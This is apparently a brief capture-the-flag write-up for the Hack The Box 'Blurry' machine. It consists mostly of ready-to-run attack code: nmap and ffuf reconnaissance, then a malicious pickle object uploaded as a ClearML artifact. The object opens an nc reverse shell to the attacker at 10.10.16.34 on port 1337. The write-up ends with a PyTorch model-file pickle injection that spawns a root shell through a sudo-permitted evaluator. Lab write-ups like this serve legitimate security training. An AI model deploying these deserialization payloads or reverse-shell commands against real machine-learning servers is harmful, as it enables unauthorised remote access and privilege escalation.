HTB: Blurry

ShellPunk

Jorge Moreno / June 10, 2024

2 min read––– views

nmap -sC -sV -o nmap/[IP] [IP]

set in /etc/hosts blurry.htb, app.blurry.htb

ffuf -u http://blurry.htb -H "Host: FUZZ.blurry.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fc 301

add all of this in /etc/hosts

bookmark

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_task(task):
    artifacts = task.artifacts
    
    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get() // EXPLOIT LAUNCHED
        
        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan", 
                            task_name="Review JSON Artifacts", 
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return
    
    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)


if __name__ == "__main__":
    main()
    cleanup()

Exploit

attacker: 10.10.16.34

port: 1337

from clearml import Task
import os

class RunCommand:
    def __reduce__(self):
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.34 1337 >/tmp/f',))

command = RunCommand()

def upload_artifact():
    task1 = Task.init(project_name='Black Swan', task_name='pick2me')
    # upload data file to the initialized task, inputting a name and file location
    task1.upload_artifact(name='innocence file', artifact_object=command)
    # close the task, to be able to initialize a new task
    task1.close()

if __name__ == "__main__":
    upload_artifact()

wildcard is the key

bookmark

Using script in the above post we can inject malicious code in the demo_model.pth and copy de modified file in the /models/ directory

python3 ./torch_pickle_inject.py demo_model.pth runpy 'import os; os.system("/bin/sh")'

sudo /usr/bin/model_evaluate /models/yourmodel.pth

Subscribe to the newsletter

Get emails from me about hacking, ctf, software development and all new articles.

- subscribers – View all issues

Discuss on TwitterSuggest Change